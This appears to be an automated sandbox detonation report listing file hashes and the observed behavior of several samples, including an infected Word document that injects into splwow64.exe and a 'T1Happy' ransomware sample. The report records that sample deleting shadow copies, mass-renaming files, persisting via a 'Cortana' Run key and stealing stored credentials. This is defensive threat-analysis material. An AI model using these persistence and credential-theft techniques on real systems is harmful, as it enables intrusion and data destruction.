| SHA256 | 325029b1e2a7a610cde9f47d26354b46b907d24acc4e90f6b67c2e1b7d04b2d2 |
| SHA512 | 00003a09f5a1494d7b0ce4d7de454f09e1c28cea7a38b1f11f76875005c1349a7f13e1068343482e8e4bcd7d02da4b327c18fd360116c19e979395fe179aaae6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d0422a0fb0856c56d4e3fd14bef61235 |
| SHA1 | d425e77b5a075635d90ee391dcce6f04327cc723 |
| SHA256 | a17fca09172603d0242bf08039a872613c25abe19d3b33616141880723e4c3a5 |
| SHA512 | 55d4d57dfa0274fb4ab49ea2df11570fcc5e716a6a5390ce5f38e0ad30da974ba7e7b17b2fa9b82b7dc7ec9bffcf34483fa29590d249a8468f0ff30e7da39028 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 018c34f0cb92c9453571183adbc0d83d |
| SHA1 | 675ad7ba77992a00b72a8ee018ea6727c953b252 |
| SHA256 | a2fa0f66e7db180f62d8289322803b58ac96eae1536fa101540ea47612814bc0 |
| SHA512 | 90b0e2b3ea731de6271315a6e43e353a2912d34f12badf501eedda1cf386313d4a69dc0457476e2e2103c95943b1f2f88bee006e721f437da6dcce7b2c115597 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b5e7e8d76341d23d0111070871a29cb5 |
| SHA1 | 1b8b335d00bcf36f776f14b977fca4a0e74fc210 |
| SHA256 | 2ff7e7e591813b1d7e7c3d06cdfd2aa2d9a829e71a6ba44d67b864339a2b85b7 |
| SHA512 | 1a354dcb59f754a7a11b8b7e62ce7a385931b66d484a16cbfd22fcfda28992ea83a985e3cdb050d544d301101ca7873bccc77eda553f3b13062d35e85536eade |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | dfff273ca3a765bcbd1407fcd2810b2f |
| SHA1 | 0cbac3cc022b932592e975e8592f2adb540ec82b |
| SHA256 | 9a0099e55d3f18892208dfd6627fb7e0fe3bf002dc3a0660e11f238f325ae619 |
| SHA512 | 665589b07f8b938716a4991fe4c79426eaa1530334e0a77518d6840750cd8cb121764c95176ebfbebfa0d97f67da3be44d9413a9efbfc1f73c97ad7bcb915fe0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 857dca8067ac951311e2574449d15dd9 |
| SHA1 | ab4cce505a36d6a084d1ceb4d2e618abe643ccad |
| SHA256 | fbe124cccbc0e589105b3e1543d570f886d671429a5599ca3e1bce9a285cff9c |
| SHA512 | 4d167d32f0db96ca6884ae720013b67e741acc88f12bc69f79de41edc6f611cb6fc0a84778f9d461595c4d0170484c8e8af8bb1c664772b2e11e2336f7a11b1d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b2a8384a28ed4fa28e485f3bf0dbc91f |
| SHA1 | 8e61727691b7d9e989b86157c5f96be6cde9a80c |
| SHA256 | 1c8a9dc3caa0d2cb48cfe6ee041878f6810458e9839f4333bf0e8f8ac0fad09a |
| SHA512 | dbcaeb6008acb8f41af15cc2cb394729a0c2067a5a255f2c9eec56e2208ea95e37a48fa36af03eff66a65b29544bccf1f508d9d54bdb31f7be658fc3e4f6beba |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d764851983b159a28c2b1436918274d2 |
| SHA1 | 40be46caf56a38ac8f06c71de8acd45528d300db |
| SHA256 | 8997c26b18eaac8ac417e34ed5122ca2514b01184fe553a167b70f11de9f25d7 |
| SHA512 | c33047e5d53ddcf86a532d73ea6ad32aa7bc3c871a2a49e43dcc3a9ab3264548446b8fdd8e4c327b90166cf843e18527143dedf5576c5e27772c18883f2cd1b0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2e17ed58d368110e0374ecfa4b308e1c |
| SHA1 | a3781f69cb4262803d1319b547c2a6bcfae37ec7 |
| SHA256 | d32888ff8a12a2f2f52a0601bcc2885a6541b8764b5adf7a999f2d0ac103240d |
| SHA512 | 09e4883b326cafa54fc7de5764fffbb1dfbd4ebbd43bc070295815f137737bf5285654c13644a48c1824cec9e9643e4a34a35783e1f45e332ce091a8e79edb53 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b2eb0d5510d02c2a4e72c6a703055d2d |
| SHA1 | f4c980ec1c714022c4b0f9789704da5eb1fc7991 |
| SHA256 | a6ee666f3e9f8b2733eedfc031c76575f5321da7cad0e3bac9b03c785bfe37e5 |
| SHA512 | 7c54ac297fa203525988aba19e85734974d3066745c55880b02203a981b1fe441771cf859d1e9edb66558de0b5424eb910edb0b93d1d81f2e857aad9856e4fbe |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 671c57d4fcaa281ee5a5f58029d46a87 |
| SHA1 | 8ac1bb64686620638d0d55ff4b9aa01f67e80dc6 |
| SHA256 | 825fde202331abbee1e00354f7b04d13d1e92b2565a61e201f648f81e5a3911b |
| SHA512 | d4fdda79933564f6309a0f62ef48ae449a2861f05572578cf587db0d05b65ed6a72a85c0df28d63be30ec8910b8d973b270100a6ed17e39c831ebeb556c9fd9c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 791af685c309d82a7c431feda3f6550e |
| SHA1 | f5092cfa8db6a347e975468fee4af75a50ba8d5b |
| SHA256 | 1b5e9fad4b135fbf4f7072bdc363913bf223c33f368e8e7f9185abf252361763 |
| SHA512 | b93b4f233afdd6eb0702ed278979d012a46a57cb9f7afa51af4c7d3f7ca75a8944c2b05be5a8fa1eaaa00def56421f3a13cd5bc3a9f877acb2ee0d1b6995ef20 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8abba63eed0fc51db6df1c1c95ef8c38 |
| SHA1 | 80419a53103c3b2a964336dd605289003bd65b86 |
| SHA256 | 092e256aca4f47702ef50f4d62987990fc5591e022c3c3da9e86deee723379bd |
| SHA512 | 2d1e92e7b64abfe0ca9bc89edb4da74b4f42f7b83fa329a352bd8254feeacc17876fdffa97f6cfec137ccc26cd8cd575df6bc9de92534508bcb251d369af4b8e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a62e24911465918336a4a2bb772812df |
| SHA1 | 81930232d1a3ea70479226cd4b0db8c0fe0f4288 |
| SHA256 | 8abb34819a227f417b8a88ea734259199056cb7bc0a03d53416a6d1584076b1a |
| SHA512 | e1c33298f1fbc0817f3705ea92bc17c93bc51bd95c520420bd6f2903573f20f07f43f6c79c9bdb3a66eb34d0978719c4be71c27ad0c4c551cf775a27ebc01cd8 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | baf60c4957e7bbc1e31c1a9155dc4f64 |
| SHA1 | 18543727bbecb3cc41b1f77dc9f7e299124114b6 |
| SHA256 | de56ee67be6f329600f5d30da671a04804d9dcc50236df7fd7d7e5a779a35453 |
| SHA512 | aa1a6fd1dc961cc7ed2cab1f573ed699d220ac9adfa0f47f6b4453e88e1ee3f6fa448354e94755162b4b0e6209149277c7ef052d510c66112517d62a58636159 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 95e3ee2dfa0b6d5f7206da9b21686e67 |
| SHA1 | c5f55d6392811fb626ed01b7c962abdd542920e8 |
| SHA256 | 517010463a5c76a9591b9898d0b5f872993e53a8c15d083c17176d5d565cbeb2 |
| SHA512 | 50b8d2376d71f5c689973d698c955cabd590df561120f84d19ff361887cd1755cb4d38bef5561fcd1879b6f9ac37dcfae79c23df8da7b2e2f6d3a874ce35c0fe |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 65ab68ad3d7c2addb8e1695cb6a01af5 |
| SHA1 | 8e65dc39db453fc2feda7f63e61761d6e261ebc3 |
| SHA256 | 86a446b63f145e1c5d5ec5c1d1c42974518199148a245c58e552d9c1051f66a8 |
| SHA512 | 97067c97c9009e488c3e19001619475e0aec173a6c9b81672f2b8beffb094a3075aecdb3ceaf81a74c202067a0c5cefe83fa68f0f4b50335a817521cdae7b65e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1bd0743e8b67e62580a552ec8f9c2349 |
| SHA1 | a4f32df7ad6f5929e44dce00b9f69f6a432dbbc7 |
| SHA256 | 460b4b52eacf0fdda6e6f993cdb64fe6b5ee7db79c8430e77cfc575ff7f3f7ad |
| SHA512 | 5408c795e6182aa3baeb5604d95ac2804e547885eeba025b945f71dd244b15f75d0cf77fd147d5a0edf1820e6363eb47a39e533a6c5aadc5dab2b210cfbe6c4d |
Analysis: behavioral16
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240903-en
Max time kernel
160s
Max time network
123s
Command Line
Signatures
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Temp\~WRD0000.tmp\:Zone.Identifier:$DATA | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2616 wrote to memory of 2600 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe |
| PID 2616 wrote to memory of 2600 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe |
| PID 2616 wrote to memory of 2600 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe |
| PID 2616 wrote to memory of 2600 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe |
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Tuyen bo chung Viet Nam - Hoa Ky - Infected.doc"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" /n "C:\Users\Admin\Desktop\ConvertToSearch.potx"
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\Desktop\PublishSplit.docx"
Network
Files
memory/2616-0-0x000000002F6C1000-0x000000002F6C2000-memory.dmp
memory/2616-2-0x000000007094D000-0x0000000070958000-memory.dmp
memory/2616-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2616-4-0x0000000000570000-0x0000000000670000-memory.dmp
memory/2616-12-0x0000000000570000-0x0000000000670000-memory.dmp
memory/2616-10-0x0000000000570000-0x0000000000670000-memory.dmp
memory/2616-11-0x0000000000570000-0x0000000000670000-memory.dmp
memory/2616-9-0x0000000000570000-0x0000000000670000-memory.dmp
memory/2616-7-0x0000000000570000-0x0000000000670000-memory.dmp
memory/2616-6-0x0000000000570000-0x0000000000670000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tuyen bo chung Viet Nam - Hoa Ky - Infected.doc
| MD5 | 5d076ea73525a76ff3f95f5eb34b92a7 |
| SHA1 | e0f7df188cfe954790e9ff7189f367f00c523757 |
| SHA256 | 7282e949d46bf42ba0978f49f18022e20555fdb90a4bfeb4c1ccfbe8a86684fd |
| SHA512 | 3dbcb4facd19aa3603ba218b6dd31f7a18a82752bd3d1c4aff0daa679341a5ae2d954fa1d11e1d7013552242f88df6e8b4b793d4df08980537cbd0003238ba99 |
memory/2616-8-0x0000000000570000-0x0000000000670000-memory.dmp
memory/2616-5-0x0000000000570000-0x0000000000670000-memory.dmp
memory/2616-28-0x000000007094D000-0x0000000070958000-memory.dmp
memory/2616-29-0x0000000000570000-0x0000000000670000-memory.dmp
memory/2972-30-0x000000002DA41000-0x000000002DA42000-memory.dmp
memory/2972-32-0x000000007094D000-0x0000000070958000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
memory/2972-52-0x000000007094D000-0x0000000070958000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240903-en
Max time kernel
117s
Max time network
119s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.MalwareScanner2.exe
"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.MalwareScanner2.exe"
Network
Files
memory/2232-0-0x000007FEF61C3000-0x000007FEF61C4000-memory.dmp
memory/2232-1-0x0000000001120000-0x0000000001148000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20241010-en
Max time kernel
122s
Max time network
128s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.PopupAlert.exe
"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.PopupAlert.exe"
Network
Files
memory/2064-0-0x000007FEF5653000-0x000007FEF5654000-memory.dmp
memory/2064-1-0x00000000009E0000-0x0000000000A56000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240903-en
Max time kernel
299s
Max time network
122s
Command Line
Signatures
T1Happy
T1happy family
Deletes shadow copies
Renames multiple (5457) files with added filename extension
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
Credentials from Password Stores: Windows Credential Manager
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Cortana = "C:\\Users\\Admin\\AppData\\Local\\Temp\\T1.exe" | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cortana = "C:\\Users\\Admin\\AppData\\Local\\Temp\\T1.exe" | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\screen.jpg" | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00810_.WMF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00373_.WMF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\BCSLaunch.dll | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL107.XML | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\LABEL.DPV | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00084_.WMF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\IPEDITOR.DLL | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME13.CSS | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00161_.GIF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00100_.WMF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21332_.GIF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\MSMAPI\1033\MSMAPI32.DLL | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent.png | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0232395.WMF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0149407.WMF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\MSACCESS.EXE | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\mset7fr.kic | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\HAMMER.WAV | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00163_.GIF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00921_.WMF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH02166_.WMF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\Bibliography\BIBFORM.XML | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\UrbanFax.Dotx | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\icon.png | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0188667.WMF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216540.WMF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0318448.WMF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PAPER_01.MID | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\JSByteCodeWin.bin | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\PICTIM32.FLT | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR38F.GIF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsPrintTemplateRTL.html | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGBARBLL.XML | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\PersonalMonthlyBudget.xltx | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\it\UIAutomationClient.resources.dll | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Windows Media Player\WMPMediaSharing.dll | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\System\msadc\msadcor.dll | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Technic.eftx | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18216_.WMF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\it-IT\gadget.xml | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SPRNG_01.MID | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18235_.WMF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\settings.html | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\ink\en-US\micaut.dll.mui | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00608_.WMF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01954_.WMF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGCHKBRD.XML | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Faculty.accdt | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CONTACTL.ICO | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Slate.css | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
